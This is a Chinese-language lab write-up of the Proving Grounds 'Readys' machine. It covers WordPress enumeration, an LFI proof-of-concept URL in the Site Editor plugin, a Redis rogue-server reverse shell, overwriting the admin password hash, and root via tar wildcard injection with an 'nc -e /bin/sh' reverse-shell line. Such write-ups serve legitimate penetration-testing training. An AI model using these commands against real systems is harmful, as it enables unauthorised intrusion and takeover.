前言
在未来将会持续更新Proving Grounds Practice内的靶机Write Up,近期本人也通过了OSCP考试,所以将打靶的所有笔记共享出来,所有的靶机推荐来源于以下链接: https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159
不过其中有一些机器已经不在Proving Grounds Practice中了,所以就没有了Write Up,本系列将有大约40台左右的机器,如果你在练习过程中遇到了困难,建议先自己进行挖掘,然后再查看Write Up,始终需要记得:Try Harder。
本文结构
一般来说本系列的Write Up将以以下的结构来进行
-
端口扫描 -
网页枚举或端口枚举 -
突破入口 -
特权提升
端口枚举
┌──(aaron㉿aacai)-[~/Desktop/Script/nmapAutomator]
└─$ ./nmapAutomator.sh -H 192.168.231.166 -t full
Running a full scan on 192.168.231.166
Host is likely running Unknown OS!
---------------------Starting Full Scan------------------------
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6379/tcp open redis
Making a script scan on all ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Readys – Just another WordPress site
|_http-generator: WordPress 5.7.2
|_http-server-header: Apache/2.4.38 (Debian)
6379/tcp open redis Redis key-value store
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
探索端口
80
┌──(aaron㉿aacai)-[~/Desktop/pg/readys]
└─$ dirsearch -u "http://192.168.231.166/"
Target: http://192.168.231.166/
[09:19:30] Starting:
[09:20:36] 301 - 0B - /index.php -> http://192.168.231.166/
[09:20:40] 200 - 19KB - /license.txt
[09:20:56] 200 - 7KB - /readme.html
[09:21:14] 301 - 321B - /wp-admin -> http://192.168.231.166/wp-admin/
[09:21:14] 302 - 0B - /wp-admin/ -> http://192.168.231.166/wp-login.php?redirect_to=http%3A%2F%2F192.168.231.166%2Fwp-admin%2F&reauth=1
[09:21:15] 400 - 1B - /wp-admin/admin-ajax.php
[09:21:15] 200 - 0B - /wp-config.php
[09:21:15] 200 - 1KB - /wp-admin/install.php
[09:21:15] 301 - 323B - /wp-content -> http://192.168.231.166/wp-content/
[09:21:15] 200 - 0B - /wp-content/
[09:21:15] 409 - 3KB - /wp-admin/setup-config.php
[09:21:15] 200 - 69B - /wp-content/plugins/akismet/akismet.php
[09:21:15] 200 - 1KB - /wp-content/uploads/
[09:21:15] 200 - 779B - /wp-content/upgrade/
[09:21:15] 200 - 0B - /wp-includes/rss-functions.php
[09:21:15] 301 - 324B - /wp-includes -> http://192.168.231.166/wp-includes/
[09:21:16] 200 - 8KB - /wp-login.php
[09:21:16] 200 - 0B - /wp-cron.php
[09:21:16] 302 - 0B - /wp-signup.php -> http://192.168.231.166/wp-login.php?action=register
[09:21:17] 200 - 49KB - /wp-includes/
80端口运行了wordpress,那思路就打开了,使用wpscan去进行扫描.
┌──(aaron㉿aacai)-[~/Desktop]
└─$ wpscan --api-token xxxx --url "http://192.168.231.166/" -e p
[+] WordPress version 5.7.2 identified (Insecure, released on 2021-05-12).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.231.166/index.php/feed/, <generator>https://wordpress.org/?v=5.7.2</generator>
| - http://192.168.231.166/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.7.2</generator>
|
[+] WordPress theme in use: twentytwentyone
| Location: http://192.168.231.166/wp-content/themes/twentytwentyone/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://192.168.231.166/wp-content/themes/twentytwentyone/readme.txt
| [!] The version is out of date, the latest version is 1.8
| Style URL: http://192.168.231.166/wp-content/themes/twentytwentyone/style.css?ver=1.3
| Style Name: Twenty Twenty-One
| Style URI: https://wordpress.org/themes/twentytwentyone/
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.231.166/wp-content/themes/twentytwentyone/style.css?ver=1.3, Match: 'Version: 1.3'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <====================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.231.166/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
i] Plugin(s) Identified:
[+] site-editor
| Location: http://192.168.231.166/wp-content/plugins/site-editor/
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| [!] 1 vulnerability identified:
|
| [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
| References:
| - https://wpscan.com/vulnerability/4432ecea-2b01-4d5c-9557-352042a57e44
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
| - https://seclists.org/fulldisclosure/2018/Mar/40
| - https://github.com/SiteEditor/editor/issues/2
|
| Version: 1.1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.231.166/wp-content/plugins/site-editor/readme.txt
找到了正在运行的插件: site-editor, 在Google搜索有关于这个插件的漏洞
第一个搜索结果说这里有本地文件包含,所以尝试进行本地文件包含。
Vulnerable code:
if( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){
require_once $_REQUEST['ajax_path'];
}
** Proof of Concept **
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
本地文件包含能够被执行
发现这里上有redis用户,尝试使用本地文件包含加载redis的密码,通常来说redis的默认路径在/etc/redis中。
得到redis的密码为Ready4Redis?
6379
┌──(aaron㉿aacai)-[~/Desktop/Script/nmapAutomator]
└─$ redis-cli -h 192.168.231.166
192.168.231.166:6379> info
NOAUTH Authentication required.
192.168.231.166:6379> exit
因为redis的需要进行登录验证,我在wordpress中发现的密码就能进行登录了.
┌──(aaron㉿aacai)-[~/Desktop/Script]
└─$ redis-cli -h 192.168.231.166 -a "Ready4Redis?"
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
192.168.231.166:6379> PING
PONG
192.168.231.166:6379>
使用redis-rogue-server来获取反弹shell.
https://github.com/n0b0dyCN/redis-rogue-server
┌──(aaron㉿aaron)-[~/Desktop/pg/Hawat/redis-rogue-server-master]
└─$ ./redis-rogue-server.py --rhost 192.168.184.166 --lhost 192.168.45.169 --passwd="Ready4Redis?"
______ _ _ ______ _____
| ___ | (_) | ___ / ___|
| |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ `--. ___ _ ____ _____ _ __
| // _ / _` | / __| | // _ / _` | | | |/ _ `--. / _ '__ / / _ '__|
| | __/ (_| | __ | | (_) | (_| | |_| | __/ /__/ / __/ | V / __/ |
_| ____|__,_|_|___/ _| ____/ __, |__,_|___| ____/ ___|_| _/ ___|_|
__/ |
|___/
@copyright n0b0dy @ r3kapig
[info] TARGET 192.168.184.166:6379
[info] SERVER 192.168.45.169:21000
[info] Setting master...
[info] Authenticating...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address: 192.168.45.169
Reverse server port: 80
[info] Reverse shell payload sent.
[info] Check at 192.168.45.169:80
[info] Unload module...
接着拿到了redis的反弹shell
PE
信息收集
计划任务
WordPress 数据库密码
╔══════════╣ Analyzing Wordpress Files (limit 70)
-rw-r--r-- 1 alice alice 3194 Nov 16 2021 /var/www/html/wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'karl' );
define( 'DB_PASSWORD', 'Wordpress1234' );
define( 'DB_HOST', 'localhost' );
查看计划任务的具体内容
redis@readys:/var/lib/redis$ cat /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html
if [ $(find . -type f -mmin -3 | wc -l) -gt 0 ]; then
tar -cf /opt/backups/website.tar *
fi
redis@readys:/var/lib/redis$ ls -al /usr/local/bin/backup.sh
-rwxr-xr-x 1 root root 122 Nov 17 2021 /usr/local/bin/backup.sh
redis@readys:/var/lib/redis$
我当前的用户权限不能对这个文件进行修改,所以登录wordpress查看更多有用的信息.
MySQL
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| wordpress |
+--------------------+
MariaDB [wordpress]> show tables;
| wp_users |
+-----------------------+
MariaDB [wordpress]> select * from wp_users;
| 1 | admin | $P$Ba5uoSB5xsqZ5GFIbBnOkXA0ahSJnb0 | admin | test@test.com
使用wordpress hash生成一个新的hash到数据库来登录admin
https://codebeautify.org/wordpress-password-hash-generator
UPDATE `wp_users` SET `user_pass` = '$P$BSYCmkP3cbJwfNftyCDZbJx0/KFjqW.' WHERE user_login = "admin"
现在可以使用admin去登录wordpress,更新 site-editor 的index.php 来反弹shell
再次访问此路径,就能够得到Alice用户的shell
然后使用alice用户去提权,计划任务也能进行修改,这个计划任务每3分钟会运行一次,使用tar的提权方式来进行提权
$ echo '#!/bin/bash' > backup.sh
$ $ echo 'nc -e /bin/sh 192.168.45.169 443' >> backup.sh
$ cat backup.sh
#!/bin/bash
nc -e /bin/sh 192.168.45.169 443
$ touch ./"--checkpoint=1"
$ touch ./"--checkpoint-action=exec=bash backup.sh"
$ ls
--checkpoint-action=exec=bash backup.sh
--checkpoint=1
backup.sh
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
最后得到root的shell
┌──(aaron㉿aaron)-[~/Desktop/script]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.45.169] from (UNKNOWN) [192.168.184.166] 35074
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/proof.txt
b46523b0963aae9409ce8bd60f4e7b68
Refer
-
https://systemweakness.com/privilege-escalation-using-wildcard-injection-tar-wildcard-injection-a57bc81df61c
-
https://gtfobins.github.io/gtfobins/tar/
END
OSCP(Offensive Security Certified Professional),中文称国际注册渗透测试专家认证,是由Offensive Security推出的200等级的证书,主要面向领域:渗透测试。
OSCP 证书是一种技术性证书,涵盖渗透测试和攻击技术方面。持有此证书的人员已通过对目标网络进行渗透测试并获得管理员访问权限的实际考试。该证书是由 Offense Security 出品,考试内容涉及网络渗透测试、漏洞挖掘、漏洞利用等方面。OSCP 考试难度较高,需要实际的技能和经验,持有此证书可证明持有人具有深入了解渗透测试及相关攻击技术的实际能力。
如果你觉得本篇文章对你有帮助,点个关注好不好呢,还可以点个在看,感谢你的支持:)))))))))))))
联系我
WeChat ID:wengchensmile
Email Address: [email protected](个人)
原文始发于微信公众号(Aaron与安全的那些事):Proving Grounds Practice-readys
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论